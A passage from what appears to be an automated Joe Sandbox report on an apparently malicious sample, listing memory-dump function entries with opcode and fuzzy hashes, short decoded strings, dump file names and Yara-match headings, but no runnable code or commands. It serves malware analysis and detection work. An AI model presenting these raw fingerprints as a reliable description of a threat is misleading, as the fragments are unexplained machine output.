                                                                                                                                                                                                                                                    • API String ID: 0-3432275560
                                                                                                                                                                                                                                                    • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                    • Instruction ID: 5688bd5eee2453339ca0577a6582e1bb1d91bc7a767e26d7b11997fb7006a877
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF42387050C3908FDB25DF68C85176EBBE1AF96314F088A6CE8E55B3A2D736C905CB52
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                    • API String ID: 0-261129489
                                                                                                                                                                                                                                                    • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                    • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                    • API String ID: 0-261129489
                                                                                                                                                                                                                                                    • Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                    • Instruction ID: ca7636d58f9e4cc3579c18b4c84b074e15e8d592ee1b55add0dcbf7d718ce64d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FE1E46111D3C18AE765CF29C451BBABBD6EFD3304F18896DC0D987293DB39850AC752
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                    • API String ID: 0-261129489
                                                                                                                                                                                                                                                    • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                    • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                    • API String ID: 0-261129489
                                                                                                                                                                                                                                                    • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                    • Instruction ID: 40fd0ab145ed778be1fdee9fc52964ff8fb27b1e6a207b207b27e83682cbfb9c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64E1B37151D3C18AE7758F2984607BBBBE6AFD3304F1888ADC1D987293DB39450ACB52
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                                    • API String ID: 0-2418547040
                                                                                                                                                                                                                                                    • Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                    • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: #$$+oQ$?{;}$DF
                                                                                                                                                                                                                                                    • API String ID: 0-1090792222
                                                                                                                                                                                                                                                    • Opcode ID: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                                                                                                                                                                                                                    • Instruction ID: f8f0a3fc3e126b0df0e9da8d66218e0bc810a6f9e0fb1804998ec3192ea1b230
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34E102B4E043549FEB10DF28D942B5EBBB0FB86304F1085ADE598AB381D7758946CF86
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                    • Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                    • API String ID: 0-483502859
                                                                                                                                                                                                                                                    • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                    • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                                    • API String ID: 0-483502859
                                                                                                                                                                                                                                                    • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                    • Instruction ID: b5743a49cef43520ac2f418b940b14968c957e61b92f9b1f555974013425b2fe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0A1B2B52417818FD728DF29C590A62BBF2FF96304B1995ADC0D68F7A6D734E802CB50
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: -$C\$Iz$[^
                                                                                                                                                                                                                                                    • API String ID: 0-2105564891
                                                                                                                                                                                                                                                    • Opcode ID: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                    • Instruction ID: 0e50c3b31625d934851f1ae5f63d886f4c12f53d555e02f8442a1293396798e8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C81EDB264C3509FD708CFA9885185FFBE2EFD1300F59C86CF0E58B251D67996068B82
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: T$U$V$k
                                                                                                                                                                                                                                                    • API String ID: 0-1255220828
                                                                                                                                                                                                                                                    • Opcode ID: d7e9605b728d24d94aa6476dc2bc71a6c7b696767e3fd5b61d48fe4e4e80319c
                                                                                                                                                                                                                                                    • Instruction ID: 419b7bd8d768cf5a93220c289582c9eeb00d0d40764b4ee896287773b3a375b3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e9605b728d24d94aa6476dc2bc71a6c7b696767e3fd5b61d48fe4e4e80319c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CA1043110C7918BD708CB38985022FBBE25BDA324F1A9B2EE4E6473D2D679C945C74B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: T$U$V$k
                                                                                                                                                                                                                                                    • API String ID: 0-1255220828
                                                                                                                                                                                                                                                    • Opcode ID: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                    • Instruction ID: d777e12cef4271c1c4527e1194311d784eb5da452426101a3c6e8f183fc2ada6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84A1133210C7908FD3049B389A902AEBBD26BD6334F194B2DE5E6872D2D67DD945CB07
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: in~x$kmbj$ydij
                                                                                                                                                                                                                                                    • API String ID: 0-2624003027
                                                                                                                                                                                                                                                    • Opcode ID: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                                                                                                                                                                                                                    • Instruction ID: f79569228283954ad57b9a6cc496d73d61da5c1ffc761606bfa780fd5c95cafa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A91245B5600A01CFC7248F24D8D16A7BBA2FF96314F18857ED4968B396E738E842CB55
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 0$V$e
                                                                                                                                                                                                                                                    • API String ID: 0-3964817793
                                                                                                                                                                                                                                                    • Opcode ID: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
                                                                                                                                                                                                                                                    • Instruction ID: 59230c03b5a3a3693ef44b30c97d38267524f76adfdce6de0efbbb4ceb4d7fde
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9822E77290C7408BD724DF38C4913AEBBD2ABD5324F194A2EE5E9973D1DA388941CB47
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 0$V$e
                                                                                                                                                                                                                                                    • API String ID: 0-3964817793
                                                                                                                                                                                                                                                    • Opcode ID: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
                                                                                                                                                                                                                                                    • Instruction ID: 441f76123652277ec852ca462494f2c0a7cdc2c03eff87ba7fdddc7d51dde721
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF22D87250D7818BD7249F3CC4953AEBBD2ABD5320F194E2DE5E9873D1DA388901CB42
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                                    • API String ID: 0-2543814982
                                                                                                                                                                                                                                                    • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                    • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                                    • API String ID: 0-3307990326
                                                                                                                                                                                                                                                    • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                    • Instruction ID: 15f920aaf5e13f3f66556f55acb73523047053a23cc3095090725888078503d8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F881DD716007128FCB28CF29C890A67B7F2FF9A710B19859DD8824FB65EB35E841CB55
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                    • API String ID: 0-2784972518
                                                                                                                                                                                                                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                    • Instruction ID: 3d54cbb3170d3150e33d71cd1f1189c548c87d6e6dcec4c39435f9439b8a5298
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C318DB6900609CFDB10DF99C880AADBBF9FF48324F15404AD841A7311D771EA49CBA4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                    • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                    • API String ID: 2994545307-936430989
                                                                                                                                                                                                                                                    • Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                    • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                    • API String ID: 0-936430989
                                                                                                                                                                                                                                                    • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                    • Instruction ID: 588fc90b4d90772ff7facbf80bde1e4e79afcd109230e90091158da73cb3ac92
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 938205746083409BDB248F2C9881B2FBBEAEBD6714F28892CE5D587291D671DC41DB87
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2312806235.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2312806235.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 0$8
                                                                                                                                                                                                                                                    • API String ID: 0-46163386
                                                                                                                                                                                                                                                    • Opcode ID: 8ecc0565c90b3a5eb509703a5ba26979ab3eac99d2d893f9d811f480a9c392cc
                                                                                                                                                                                                                                                    • Instruction ID: d40c633f6dc63a9644a0400b392de52ca6438bdc0a59f23ad90aea60c423d6c9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ecc0565c90b3a5eb509703a5ba26979ab3eac99d2d893f9d811f480a9c392cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC7213716087409FD714CF18C880BABBBE1EB88314F04892EF9899B391D379D948DF96
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314041305.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_980000_N1sb7Ii2YD.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 0$8
                                                                                                                                                                                                                                                    • API String ID: 0-46163386
                                                                                                                                                                                                                                                    • Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                    • Instruction ID: 7e96e034736512f1be7d9a570f8a206356e468428c1c85abc1ec561fc374076c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B7268716087409FDB14DF28C880BAFBBE1AF88314F45892DF9998B391D775D948CB92
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
